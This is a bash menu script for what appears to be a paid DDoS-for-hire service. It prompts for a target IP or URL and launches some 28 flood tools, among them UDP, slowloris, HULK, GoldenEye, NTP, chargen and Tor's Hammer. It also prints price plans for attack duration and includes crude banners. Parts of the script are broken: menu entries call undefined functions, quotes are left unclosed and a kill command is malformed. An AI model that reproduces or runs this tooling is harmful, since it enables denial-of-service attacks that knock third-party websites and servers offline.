#!/bin/bash
BLACK='\e[0;30m'
BLUE='\e[0;34m'
GREEN='\e[0;32m'
CYAN='\e[0;36m'
RED='\e[0;31m'
PURPLE='\e[0;35m'
BROWN='\e[0;33m'
LIGHTGRAY='\e[0;37m'
DARKGRAY='\e[1;30m'
LIGHTBLUE='\e[1;34m'
LIGHTGREEN='\e[1;32m'
LIGHTCYAN='\e[1;36m'
LIGHTRED='\e[1;31m'
LIGHTPURPLE='\e[1;35m'
YELLOW='\e[1;33m'
WHITE='\e[1;37m'
NC='\e[0m'              # No Color
# Trap Signal Script
#exit_script()
{
  echo "* * *Fuck Off * * *"
  perl menu


}


hulksmash()
{
    clear
	echo -e "${LIGHTGREEN}"
echo -e "  _   _           _   _     "
echo -e " | | | |  _   _  | | | | __ "
echo -e " | |_| | | | | | | | | |/ / "
echo -e " |  _  | | |_| | | | |   <  "
echo -e " |_| |_|  \____| |_| |_|\_\ "
echo ""
echo -e -n "${GREEN}Enter websites URL: "
read Host
python hulk.py $Host
} 

udp_floodb()
{
    clear
    echo -e "${LIGHTRED}"
echo -e "   ____    _                    _   _     _  "   
echo -e "  / ___|  | |_    ___    ____  | | | |_  | |__"  
echo -e "  \___ \  | __|  / _ \  / _  | | | | __| |    \ " 
echo -e "   ___) | | |_  |  __/ | (_| | | | | |_  | | | |"
echo -e "  |____/   \__|  \___|  \____| |_|  \__| |_| |_| "                                              
echo "[==================================================================]"
echo -e "[  ${YELLOW}Sinnalot UDP LaG ${LIGHTRED}]"
echo "[==================================================================]"
echo -e -n "${RED}Enter Target Ip: "
read ip
echo -e -n "${RED}Enter Port: "
read port
echo -e -n "${RED}Enter Time: "
read time
perl esg.pl $ip $port 100 10000
}

customperl()
{
    clear
    echo -e " ${RED} "
echo -e "       _____           _   _  "
echo -e "      | ____| __   __ (_) | |"
echo -e "      |  _|   \ \ / / | | | |"
echo -e "      | |___   \ V /  | | | |"
echo -e "      |_____|   \_/   |_| |_|"
    echo ""
    echo "    EVIL Sinnalot"
    echo ""
echo "Enter target ip please :"
read ip
echo "Enter a Port Number :"
read port
echo "Enter a the time :"
read time
echo "Enter the size Ex: 1"
read size
perl system.pl $ip $port $size $time
}

pythonv1()
{
    clear
        echo -e " ${LIGHTRED} "
echo -e "55555555555555555555555555555555555555555555555555"
echo -e "55555555555555555555555555555555555555555555555555"
echo -e "55555555555555555_5555555555555555_555555555555555"
echo -e "55555555555555555__55555555555555_5555555555555555"
echo -e "555555555555555555_______________55555555555555555"
echo -e "5555555555555555___________________555555555555555"
echo -e "55555555555555____555_________555____5555555555555"
echo -e "5555555555555_____555_________555_____555555555555"
echo -e "555555555555___________________________55555555555"
echo -e "555555555555___________________________55555555555"
echo -e "55555555555555555555555555555555555555555555555555"
echo -e "55555____555____________________________555____555"
echo -e "5555______55____________________________55______55"
echo -e "5555______55____________________________55______55"
echo -e "5555______55____________________________55______55"
echo -e "5555______55____________________________55______55"
echo -e "5555______55____________________________55______55"
echo -e "5555______55____________________________55______55"
echo -e "5555______55____________________________55______55"
echo -e "5555______55____________________________55______55"
echo -e "55555____555____________________________555____555"
echo -e "555555555555____________________________5555555555"
echo -e "555555555555____________________________5555555555"
echo -e "555555555555___________________________55555555555"
echo -e "55555555555555555______555555_____5555555555555555"
echo -e "55555555555555555______555555_____5555555555555555"
echo -e "55555555555555555______555555_____5555555555555555"
echo -e "55555555555555555______555555_____5555555555555555"
echo -e "55555555555555555______555555_____5555555555555555"
echo -e "55555555555555555555555555555555555555555555555555"
    echo ""
echo -e -n "${RED}Enter Victims ip : "
read ip
echo -e -n "${CYAN}Enter Targets Port : "
read port
echo -e -n "${LIGHTRED}Enter Time : "
read time
python system.py $ip $port $time
}

slowloris()
{
    clear
    echo -e " ${BLUE} "
    echo "               Slow That Website Down >:) "  
    echo ""                                                     
    echo -e "                    '||                      "
    echo -e "              ....   ||    ...   ... ... ... "
    echo -e "             ||. '   ||  .|  '|.  ||  ||  |  "
    echo -e "             . '|..  ||  ||   ||   ||| |||   "
    echo -e "             |'..|' .||.  '|..|'    |   |   "
    echo ""
    echo "    Nelkqs Custom SlowLoris"
    echo ""
echo "To stop this script after execution hold [CTRL] + [C]"
echo "Enter website address :"
read host
echo "Enter a port :"
read port
./cgisystem $host $port
}

bd()
{
    clear
    echo -e " ${RED} "
    echo "               Drain That Hoe" 
    echo ""                                                      
    echo -e "        '||''|.                    ||           "
    echo -e "         ||   ||  ... ..   ....   ...  .. ...   "
    echo -e "         ||    ||  ||' '' '' .||   ||   ||  ||  "
    echo -e "         ||    ||  ||     .|' ||   ||   ||  ||  "
    echo -e "        .||...|'  .||.    '|..'|' .||. .||. ||. "
    echo ""
    echo "    Drain That Ip Like A Boss lol"
    echo ""
echo "Enter target ip please :"
read ip
echo "Enter a Port Number :"
read port
echo "Enter a the time :"
read time
./cgi -i $ip -p $port -s 32000 -t $time
}

toxicmods()
{
    clear
    echo -e "${GREEN}"
echo -e "    _____                  _        "
echo -e "   |_   _|   ___   __  __ (_)   ___  "
echo -e "     | |    / _ \  \ \/ / | |  / __|    "
echo -e "     | |   | (_) |  >  <  | | | (__    "
echo -e "     |_|    \___/  /_/\_\ |_|  \___| "
echo -e -n "${GREEN}Enter Target Ip: "
read ip
echo -e -n "${PURPLE}Enter Port: "
read port
echo -e -n "${GREEN}Enter Time: "
read time
perl toxicmods.pl $ip $port $time
}

perl_script()
{
    clear
    echo -e "${LIGHTRED}"
    echo -e "  ____                  _ "
    echo -e " |  _ \    ___   ____  | | "
    echo -e " | |_) |  / _ \ |  __| | | "
    echo -e " |  __/  |  __/ | |    | | "
    echo -e " |_|      \___| |_|    |_| "
echo -e -n "${RED}Enter Target Ip: "
read ip
echo -e -n "${RED}Enter Port: "
read port
echo -e -n "${RED}Enter Time: "
read time
perl esg.pl $ip $port $time
}

slap()
{
    clear
    echo -e "${RED}"
echo -e " __  __         _ _             "
echo -e " \ \/ /___   __| (_) __ _        "
echo -e "  \  // _ \ / _  | |/ _  |        "
 echo -e " /  \ (_) | (_| | | (_| |       "
echo -e " /_/\_\___/ \____|_|\____|     "
echo "[==================================================================]"
echo -e "[  ${LIGHTRED}Nelkq ${RED}] "
echo "[==================================================================]"
echo -e -n "${RED}Enter Target Ip: "
read ip
echo -e -n "${RED}Enter Port: "
read port
echo -e -n "${RED}Enter Time: "
read time
perl system.py $ip $port $time 
}

xodiav2()
{
    clear
    echo -e "${WHITE}"
echo "_____Sexy?Sex "
echo " ____?Sexy?Sexy"
echo " ___y?Sexy?Sexy?"
echo " ___?Sexy?Sexy?S"
echo " ___?Sexy?Sexy?S"
echo "__?Sexy?Sexy?Se"
echo "_?Sexy?Sexy?Se"
echo "_?Sexy?Sexy?Se"
echo " _?Sexy?Sexy?Sexy?"
echo " ?Sexy?Sexy?Sexy?Sexy"
echo " ?Sexy?Sexy?Sexy?Sexy?Se"
echo "?Sexy?Sexy?Sexy?Sexy?Sex "
echo " _?Sexy?__?Sexy?Sexy?Sex"
echo "___?Sex____?Sexy?Sexy?"
echo " ___?Sex_____?Sexy?Sexy"
echo " ___?Sex_____?Sexy?Sexy"
echo " ____?Sex____?Sexy?Sexy"
echo " _____?Se____?Sexy?Sex"
echo " ______?Se__?Sexy?Sexy"
echo "_______?Sexy?Sexy?Sex"
echo " ________?Sexy?Sexy?sex"
echo "_______?Sexy?Sexy?Sexy?Se"
echo " _______?Sexy?Sexy?Sexy?Sexy?"
echo "_______?Sexy?Sexy?Sexy?Sexy?Sexy"
echo "_______?Sexy?Sexy?Sexy?Sexy?Sexy?S"
echo "________?Sexy?Sexy____?Sexy?Sexy?se"
echo " _________?Sexy?Se_______?Sexy?Sexy?"
echo " _________?Sexy?Se_____?Sexy?Sexy?"
echo "_________?Sexy?S____?Sexy?Sexy"
echo "________?Sexy?Sexy?Sexy"
echo " ________?Sexy?Sexy?S"
echo " ________?Sexy?Sexy"
echo " _______?Sexy?Se"
echo " _______?Sexy?"
echo " ______?Sexy?"
echo "______?Sexy?"
echo "______?Sexy?"
echo "______?Sexy"
echo "______?Sexy"
echo "_______?Sex"
echo "_______?Sex"
echo " _______?Sex"
echo "______?Sexy"
echo " ______?Sexy"
echo " _______Sexy"
echo " _______ Sexy?"
echo "________SexY  "                               
echo "[==================================================================]"
echo -e "[  ${WHITE}Sinnalot Has A Nice Model ;)   ${LIGHTRED}]"
echo "[==================================================================]"
echo -e -n "${RED}Enter That Sexy Targets Ip: "
read ip
echo -e -n "${RED}Enter Sexy Port: "
read port
echo -e -n "${RED}Enter Sexy Time: "
read time
perl system.pl $ip $port $time
}

goldeneye()
{
clear 
echo -e "Goldeneye Web Downer"
echo -e -n "${CYAN}Enter Http:// : "
read http
python 007.py $http
}

http()
{
clear 
echo -e "     __  __      ____      _       _     _           " 
echo -e "     \ \/ /     |  _ \    | |__   | |_  | |_   _ __  " 
echo -e "      \  /      | | | |   |  _ \  | __| | __| |  _ \ " 
echo -e "      /  \   _  | |_| |   | | | | | |_  | |_  | |_) |" 
echo -e "     /_/\_\ (_) |____/    |_| |_|  \__|  \__| |  __/ " 
echo -e "                                              |_|   " 
echo -e "X.D Sinnalots Custom Python Http Website Downer"
echo -e -n "${CYAN}Enter Website URL : "
read http
python 007.py $http
}

deluser()
{
#!/bin/bash
clear
echo "+=================================+"
echo "+---------------------------------+"
echo " +           Remove User         + "
echo " +                               + "
echo " +-------------------------------+ "
echo " "
echo "Username: "
read uname
userdel $uname
rm -r /home/$uname
echo "User removed"
echo "press any key when done"
read
}

fry()
{
    clear
    echo -e "${LIGHTRED}"
echo -e "         _   _   ____    ____ " 
echo -e "   ____ | | | | |  _ \  |  _ \ "
echo -e "  |_  / | | | | | | | | | |_) |"
echo -e "   / /  | |_| | | |_| | |  __/ "
echo -e "  /___|  \___/  |____/  |_|   "
echo "[==================================================================]"
echo -e "[  ${RED}Sinnalot zUDP Flood Attack  ${RED}]"
echo "[==================================================================]"                
echo -e -n "${RED}Enter Target Ip: "
read ip
echo -e -n "${RED}Enter Port: "
read port
echo -e -n "${RED}Enter Time: "
read time
perl esg.pl $ip $port $time
}

py()
{
    clear
    echo -e "${LIGHTRED}"
echo -e "  __  __                   _         "
echo -e " |  \/  |   ____    ____  (_)   ___  " 
echo -e " | |\/| |  / _  |  / _  | | |  / __| "
echo -e " | |  | | | (_| | | (_| | | | | (__  "
echo -e " |_|  |_|  \__,_|  \__  | |_|  \___| "
echo -e "                   |___/             "
echo "[==================================================================]"
echo -e "[  ${RED}Sinnalot Magic Flood Attack  ${RED}]"
echo "[==================================================================]"
echo -e -n "${RED}Enter Target Ip: "
read ip
echo -e -n "${RED}Enter Port: "
read port
echo -e -n "${RED}Enter Time: "
read time
perl magic.pl $ip $port $time
}

adduser()
{
#!/bin/bash
clear
echo "+=================================+"
echo "+---------------------------------+"
echo " +           Add New User        + "
echo " +                               + "
echo " +-------------------------------+ "
echo " "
echo "New Username: "
read uname
useradd $uname
mkdir /home/$uname
cp /home/gott/start /home/$uname/menu
passwd $uname 
cd /home/$uname
chmod 777 *
echo "User Added, Password set to GoTT"
echo "press any key when done"
read
}

price()
{
echo -e "${WHITE}" 
echo -e "★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆"
echo -e "${RED}"
 echo -e " ____           _                     "
echo -e "|  _ \   _ __  (_)   ___    ___   ___  "
echo -e "| |_) | | '__| | |  / __|  / _ \ / __|        "
echo -e "|  __/  | |    | | | (__  |  __/ \__ \          "
echo -e "|_|     |_|    |_|  \___|  \___| |___/     "
echo -e "${WHITE}"    
echo -e "★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆"
echo -e "##### Sinnalot Servers ##### {PLANS}"
echo -e "Packages:"
echo -e "    15: 1200s/MEDIUM Power/1 Concurrent"
echo -e "    25: 3600s/MAX Power/1 Concurrent"
echo -e "    40: 3600S/MAX Power/Unlimited Concurrents"
echo -e "    60: Unlimited time/MAX Power/Unlimited Concurrents"
echo -e "Payment Accepting only: Paypal And Amazon!"
read
}

killall()
{
    clear
    echo -e " ${LIGHTRED} "
echo "      _  __  _   _   _ "
echo "     | |/ / (_) | | | |   "
echo "    | ' /  | | | | | |    "
echo "    | . \  | | | | | | "
echo "     |_|\_\ |_| |_| |_| "
pkill hulk.py
pkill udp.pl
pkill torshammer.py
pkill gott.4.pl
pkill slowloris
pkill weed.pl 
pkill magic.pl
pkill esg.pl
pkill system.pl
pkill system.py
pkill cgi
pkill cgisystem
}

ack.pl()
{
clear
echo -e "${LIGHTRED}"
echo -e "       _             _    "
echo -e "       / \      ___  | | __ "
echo -e "      / _ \    / __| | |/ /   "
echo -e "     / ___ \  | (__  |   <  "
echo -e "    /_/   \_\  \___| |_|\_\ "
echo ""
echo -e -n "${WHITE} Enter Foe's ip: "
read ip
echo -e -n "${RED} Enter Port (80) Recommended: "
read port
echo -e -n "${WHITE} Enter Time: "
read time
perl system.pl $ip $port  $time
}
 
ntp()
{
clear
echo -e "${LIGHTRED}"
echo -e "   _   _   _____   ____  " 
echo -e "   | \ | | |_   _| |  _ \ " 
echo -e "   |  \| |   | |   | |_) |" 
echo -e "   | |\  |   | |   |  __/ " 
echo -e "   |_| \_|   |_|   |_|    " 
echo ""
echo -e -n "${WHITE} Enter Foe's ip: "
read ip
echo -e -n "${RED} Enter Port (80) Recommended: "
read port
echo -e -n "${WHITE} Enter Time: "
read time
perl system.pl $ip $port $time
}
 
zap()
{
clear
echo -e "${YELLOW}"
echo -e "      _____                " 
echo -e "     |__  /   __ _   _ __  " 
echo -e "      / /   / _  | |  _ \ " 
echo -e "     / /_  | (_| | | |_) |" 
echo -e "    /____|  \__ _| |  __/ " 
echo -e "                    |_|    " 
echo ""
echo -e -n "${WHITE} Enter Foe's ip: "
read ip
echo -e -n "${RED} Enter Port (80) Recommended: "
read port
echo -e -n "${WHITE} Enter Time: "
read time
perl zap.pl $ip $port $time
}
 
dosdevil()
{
clear
echo -e "${LIGHTRED}"
echo -e "      ____            ____    ____    _____           _   _ " 
echo -e "     |  _ \    ___   / ___|  |  _ \  |___ /  __   __ (_) | |" 
echo -e "     | | | |  / _ \  \___ \  | | | |   |_ \  \ \ / / | | | |" 
echo -e "     | |_| | | (_) |  ___) | | |_| |  ___) |  \ V /  | | | |" 
echo -e "     |____/   \___/  |____/  |____/  |____/    \_/   |_| |_|    "                                                    
echo ""
echo -e -n "${WHITE} Enter Skids ip: "
read ip
echo -e -n "${RED} Enter Port (80) Recommended: "
read port
echo -e -n "${WHITE} Enter Time: "
read time
perl dosdevil.pl $ip $port $time
}
 
 essyn.pl()
{
clear
echo -e "${LIGHTRED}"    
echo -e "       ___   ___   ___   _   _   _ __ " 
echo -e "      / _ \ / __| / __| | | | | | '_ \  "  
echo -e "     |  __/ \__ \ \__ \ | |_| | | | | | " 
echo -e "      \___| |___/ |___/  \__, | |_| |_| " 
echo -e "                         |___/   " 
echo -e ""						  
echo -e -n "${WHITE} Enter Foe's ip: "
read ip
echo -e -n "${RED} Enter Port (80) Recommended: "
read port
echo -e -n "${RED} Enter Size (65500) Recommended: "
read size
echo -e -n "${WHITE} Enter Time: "
read time
perl system.pl $ip $port $size $time
}
 
 hydrasmash()
{
    clear
  
echo -e " ${GREEN}"                                                                                                                                                                 
echo -e " ____   ____  _____      _____      _____        _____          ____                  ______      ______  _______          ____            ______   ____   ____ "
echo -e "|    | |    ||\    \    /    /| ___|\    \   ___|\    \    ____|\   \             ___|\     \    |      \/       \    ____|\   \       ___|\     \ |    | |    |"
echo -e "|    | |    || \    \  /    / ||    |\    \ |    |\    \  /    /\    \           |    |\     \  /          /\     \  /    /\    \     |    |\     \|    | |    |"
echo -e "|    |_|    ||  \____\/    /  /|    | |    ||    | |    ||    |  |    |          |    |/____/| /     /\   / /\     ||    |  |    |    |    |/____/||    |_|    |"
echo -e "|    .-.    | \ |    /    /  / |    | |    ||    |/____/ |    |__|    |       ___|    \|   | |/     /\ \_/ / /    /||    |__|    | ___|    \|   | ||    .-.    |"
echo -e "|    | |    |  \|___/    /  /  |    | |    ||    |\    \ |    .--.    |      |    \    \___|/|     |  \|_|/ /    / ||    .--.    ||    \    \___|/ |    | |    |"
echo -e "|    | |    |      /    /  /   |    | |    ||    | |    ||    |  |    |      |    |\     \   |     |       |    |  ||    |  |    ||    |\     \    |    | |    |"
echo -e "|____| |____|     /____/  /    |____|/____/||____| |____||____|  |____|      |\ ___\|_____|  |\____\       |____|  /|____|  |____||\ ___\|_____|   |____| |____|"
echo -e "|    | |    |    |    | /     |    /    | ||    | |    ||    |  |    |      | |    |     |  | |    |      |    | / |    |  |    || |    |     |   |    | |    |"
echo -e "|____| |____|    |_____|/      |____|____|/ |____| |____||____|  |____|       \|____|_____|   \|____|      |____|/  |____|  |____| \|____|_____|   |____| |____|"
echo -e "  \(     )/         )/           \(    )/     \(     )/    \(      )/            \(    )/        \(          )/       \(      )/      \(    )/       \(     )/ "
echo -e "   '     '          '             '    '       '     '      '      '              '    '          '          '         '      '        '    '         '     ' "                                                                                                                                                            
echo -e -n "${BROWN} Ip :"
read ip
echo -e -n "${BROWN}Port : "
read port
echo -e -n "${BROWN} Time : "
read time
perl hydrasmasha.pl $ip $port $time
}
 
chargen.pl()
{
clear
echo -e "${LIGHTRED}"    
echo -e "░░█▀░░░░░░░░░░░▀▀███████░░░░ "
echo -e "░░█▌░░░░░░░░░░░░░░░▀██████░░░ "
echo -e "░█▌░░░░░░░░░░░░░░░░███████▌░░ "
echo -e "░█░░░░░░░░░░░░░░░░░████████░░ "
echo -e "▐▌░░░░░░░░░░░░░░░░░▀██████▌░░ "
echo -e "░▌▄███▌░░░░▀████▄░░░░▀████▌░░ "
echo -e "▐▀▀▄█▄░▌░░░▄██▄▄▄▀░░░░████▄▄░ "
echo -e "▐░▀░░═▐░░░░░░══░░▀░░░░▐▀░▄▀▌▌ "
echo -e "▐░░░░░▌░░░░░░░░░░░░░░░▀░▀░░▌▌ "
echo -e "▐░░░▄▀░░░▀░▌░░░░░░░░░░░░▌█░▌▌ "
echo -e "░▌░░▀▀▄▄▀▀▄▌▌░░░░░░░░░░▐░▀▐▐░ "
echo -e "░▌░░▌░▄▄▄▄░░░▌░░░░░░░░▐░░▀▐░░ "
echo -e "░█░▐▄██████▄░▐░░░░░░░░█▀▄▄▀░░ "
echo -e "░▐░▌▌░░░░░░▀▀▄▐░░░░░░█▌░░░░░░" 
echo -e "░░█░░▄▀▀▀▀▄░▄═╝▄░░░▄▀░▌░░░░░░ "
echo -e "░░░▌▐░░░░░░▌░▀▀░░▄▀░░▐░░░░░░░ "
echo -e "░░░▀▄░░░░░░░░░▄▀▀░░░░█░░░░░░░ "
echo -e "░░░▄█▄▄▄▄▄▄▄▀▀░░░░░░░▌▌░░░░░░ "
echo -e "░░▄▀▌▀▌░░░░░░░░░░░░░▄▀▀▄░░░░░ "
echo -e "▄▀░░▌░▀▄░░░░░░░░░░▄▀░░▌░▀▄░░░ "
echo -e "░░░░▌█▄▄▀▄░░░░░░▄▀░░░░▌░░░▌▄▄ "
echo -e "░░░▄▐██████▄▄░▄▀░░▄▄▄▄▌░░░░▄░ "
echo -e "░░▄▌████████▄▄▄███████▌░░░░░▄ "
echo -e "░▄▀░██████████████████▌▀▄░░░░ "
echo -e "▀░░░█████▀▀░░░▀███████░░░▀▄░░ "
echo -e "░░░░▐█▀░░░▐░░░░░▀████▌░░░░▀▄░ "
echo -e "░░░░░░▌░░░▐░░░░▐░░▀▀█░░░░░░░▀ "
echo -e "░░░░░░▐░░░░▌░░░▐░░░░░▌░░░░░░░ "
echo -e "░╔╗║░╔═╗░═╦═░░░░░╔╗░░╔═╗░╦═╗░ "
echo -e "░║║║░║░║░░║░░░░░░╠╩╗░╠═╣░║░║░ "
echo -e "░║╚╝░╚═╝░░║░░░░░░╚═╝░║░║░╩═╝░"  
    echo -e "Bet Thats how u will Feel When u test it ;) "	
	echo -e ""
    echo -e -n "${WHITE} Enter Foe's ip: "
    read ip
    echo -e -n "${RED} Enter Port (80) Recommended: "
    read port
    echo -e -n "${WHITE} Enter Time: "
    read time
perl system.pl $ip $port $time
}
 
 rand()
 {
    clear 
echo -e "      ____                        _     "	        
echo -e "     |  _ \       _   _        __| |      _   _ "	
echo -e "     | |_) |     | | | |      / _  |     | | | |"	
echo -e "    |  _ <   _  | |_| |  _  | (_| |  _  | |_| |"	
echo -e "    |_| \_\ (_)  \____| (_)  \____| (_)  \___|"	
echo -e "                                          |___/ "	
echo -e "		+-+-+-+-+ +-+-+-+-+ "	
echo -e "		|H|T|T|P| |R|u|d|y| "	
echo -e "		+-+-+-+-+ +-+-+-+-+ "	
echo -e ""
echo -e ""
echo -e "<ip/url> = 0.0.0.0 or URL.com "	
echo -e "<time> = Time in seconds "	
echo -e ""
echo -e "Example IP : perl rand.pl 95.0.0.0 60 "	
echo -e "Example URL : perl rand.pl site.com 60 "	
echo -e ""
echo -e "[ Do U Love Sin? am i Awesome? ^_^] "	
echo -e "[ D4RKZz] "	
echo "" 
echo -e -n "${WHITE}Enter URL or ip: "
read ip
echo -e -n "${RED}Enter Time in seconds: "
read time
perl rand.pl $ip $time
}

whoson()
{
#!/bin/bash
clear
echo "+=================================+"
echo "+---------------------------------+"
echo " +           whos on             + "
echo " +                               + "
echo " +-------------------------------+ "
w
echo "press any key when done"
read
}

udp.pl()
{
  echo -e "${RED}"
echo -e "  _   _   ____    ____  "
echo -e " | | | | |  _ \  |  _ \ "
echo -e " | | | | | | | | | |_) | "
echo -e " | |_| | | |_| | |  __/ "
echo -e "  \___/  |____/  |_| "   
echo "[==================================================================]"
echo -e "[  ${LIGHTRED}Crxck UDP Flood Attack  ${LIGHTRED}]"
echo "[==================================================================]"
echo -e -n "${RED}Enter Target Ip: "
read ip
echo -e -n "${RED}Enter Port: "
read port
echo -e -n "${RED}Enter Time: "
read time
perl udp.pl $ip $port $time
}

lockkill()
{
#!/bin/bash
clear
echo "+=================================+"
echo "+---------------------------------+"
echo " +      List User Processes      + "
echo " +                               + "
echo " +-------------------------------+ "
echo "Enter Username: "
read uname
passwd -l $uname
kill -9 ps -u $uname -o "pid="
echo "press any key when done"
read
}

tor()
{
    clear
    echo -e " ${YELLOW} "
    echo "               TorLoris Is Decent"  
    echo ""                                                     
    echo -e "              |''||''|         '||''|.  "
    echo -e "                 ||      ...    ||   ||  "
    echo -e "                 ||    .|  '|.  ||''|'  "
    echo -e "                 ||    ||   ||  ||   |.  "
    echo -e "                .||.    '|..|' .||.  '|'  "
    echo ""
    echo "    Get Tored xD Makes Sense?"
    echo ""
echo "Enter target ip please :"
read ip
./torshammer.py -t $ip -r 256
}

mydick()
{
    clear
  
echo -e " ${PINK} " 
echo -e "  __  __         _____  _      _"     
echo -e " |  \/  |       |  __ \(_)    | |"    
echo -e " | \  / |_   _  | |  | |_  ___| | __" 
echo -e " | |\/| | | | | | |  | | |/ __| |/ /" 
echo -e " | |  | | |_| | | |__| | | (__|   <"  
echo -e " |_|  |_|\__, | |_____/|_|\___|_|\_\ " 
echo -e "          __/ |"                      
echo -e "         |___/ "
echo -e -n "${PURPLE} Ip :"
read ip
echo -e -n "${PINK} Port : "
read port
echo -e -n "${PURPLE} Time : "
read time
perl mydick.pl $ip $port $time
}

weed_flood()
{
    clear
    echo -e "${GREEN}"
echo -e "  __        __________________        "
echo -e "  \ \      / / ____| ____|  _ \       "
echo -e "   \ \ /\ / /|  _| |  _| | | | |      "
echo -e "    \ V  V / | |___| |___| |_| |      "
echo -e "     \_/\_/  |_____|_____|____/       " 
echo -e "                                      "
echo -e "          BY Sinnalot              "
echo -e "                &                     "
echo -e "           Sinnalot                  "
echo -e "                                      "                    
echo "[==================================================================]"
echo -e "[  ${WHITE}Nelkq WEED FLOOD ${GREEN}]"                      
echo "[==================================================================]"
echo -e -n "${GREEN}Enter Target Ip: "
read ip
echo -e -n "${WHITE}Enter Port: "
read port
echo -e -n "${GREEN}Enter Time: "
read time
perl weed.pl $ip $port $time
}

exit_script1()
{
  exit 1
}

Take_input1()
{
clear
while :
do
	   clear
echo -e "${WHITE}" 
echo -e "★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆${RED}"
echo -e " 
echo -e "---++--+++++-+++
echo -e "----
echo -e "+-+++++++++---++
echo -e "____________________
   "
echo -e "    "
echo -e "   "
echo -e "  "
echo -e " "
echo -e "${WHITE}"
echo -e "★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆"
	echo -e "${LIGHTGREY} To Stop a DdoS hit ctrl + c "
	echo -e " ${LIGHTRED}Made by: NELKQ"
    echo -e "Welcome User (${CYAN}root${LIGHTRED})[Membership]${WHITE}[Kik BG_700_]"
	echo -e "${LIGHTGREEN}       |Server Specs|"
	echo -e "${CYAN}CPU: Intel E5-2620V2   CPU Frequency : 6 x 2.6Ghz  Ram:32Gb"
	echo -e "Port Speed:1Gb  Bandwidth: Unmetered  IP Addresses: 32ips Operating System: CentOS 7.x"
	echo -e "DDoS Protection Included"
	echo -e "Menu Made By: Nelkq "
	echo -e "${WHITE}★★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆"
	echo -e "${RED}[1]-UDP ${RED}(UserDatagramProtocol)                                               "          
	echo -e "${WHITE}[2]-Magic                                                       "
	echo -e "${RED}[3]-zUDP Flood                                              "                           
	echo -e "${WHITE}[4]-Xodia ${RED}Servers ${WHITE}Scripts                                                          "
	echo -e "${RED}[5]-Hulk Website Destroyer                              "
    echo -e "${WHITE}[6]-UDP Stealth           "
    echo -e "${RED}[7]-Crxcks Custom Perl Script       "
    echo -e "${WHITE}[8]-Weed Flood                            "
	echo -e "${RED}[9]-Prices                             "
    echo -e "${WHITE}[10]-Sexy Method                             "
	echo -e "${RED}[11]-${RED}Evil IP Destroyer  ${WHITE}(RECOMMENDED)                        "
	echo -e "${WHITE}[12]-${WHITE}Rekt IP Slayer ${RED}(RECOMMENDED)                      "
	echo -e "${RED}[13]-SlorLoris ${WHITE} (NEW)                      "
	echo -e "${WHITE}[14]-BandWidth Drain ${RED} (NEW)                           "
	echo -e "${RED}[15]-TorLoris ${WHITE} (NEW)"
	echo -e "${WHITE}[16]-Stops All the Attacks "
	echo -e "${RED}[17]-Ack "
	echo -e "${WHITE}[18]-Essyn"
	echo -e "${RED}[19]-Chargen"
	echo -e "${WHITE}[20]-Toxic Custom Script"
	echo -e "${RED}[21]-NTP Flooder"
	echo -e "${WHITE}[22]-Zap Attack"
	echo -e "${RED}[23]-DosDevill"
	echo -e "${WHITE}[24]-R.U.D.Y"
	echo -e "${RED}[25]-GoldenEYE Web Downer"
	echo -e "${WHITE}[26]-X.D http Destruction"
	echo -e "${RED}[27]-My Dick"
	echo -e "${WHITE}[28]-Crxck Smash"
	echo -e ""
	echo -e -n "${LIGHTRED}Select Choice (1 - 28):${CYAN} "
    read yourch
    case $yourch in
      1) Ace.pl ;;
	  2) Anon.pl ;;
	  3) grumpy.pl ;;
	  4) Ho.pl ;;
	  5) Kill.pl ;;
	  6) send.pl ;;
	  7) Slam.pl ;;
          8) fuck.pl ;;
		  9) DoS.pl;;
		  10) crxckv2;;
		 11) extords.pl;;
        12) Sin.pl;;  
           13) vmt.pl;;		
		 14) bunny.pl;;
      	15) tor;;	  
          16) killall ;;	
        17) ack.pl ;;	
       18) essyn.pl ;;
       19) chargen.pl ;;	
      20) toxicmods ;;	 
    21) ntp ;;	  
	22) zap ;;
	23) dosdevil ;;
	 24) rand ;;
	 25) goldeneye ;;
	 26) http ;;
    27) mydick ;;
	28) hydrasmash ;;
	  end) pkill menu  ;;
      *) echo "~Nelkq~" ;
         echo "You Entered Something wrong unless we Havent Updated That Yet" ; read ;;
 esac
done # end_while
}
#
# Set trap to for CTRL+C interrupt i.e. Install our error handler
# When occurs it first it calls del_file() and then exit
#
trap exit_script 2
#
# Call our user define function : Take_input1
#
Take_input1
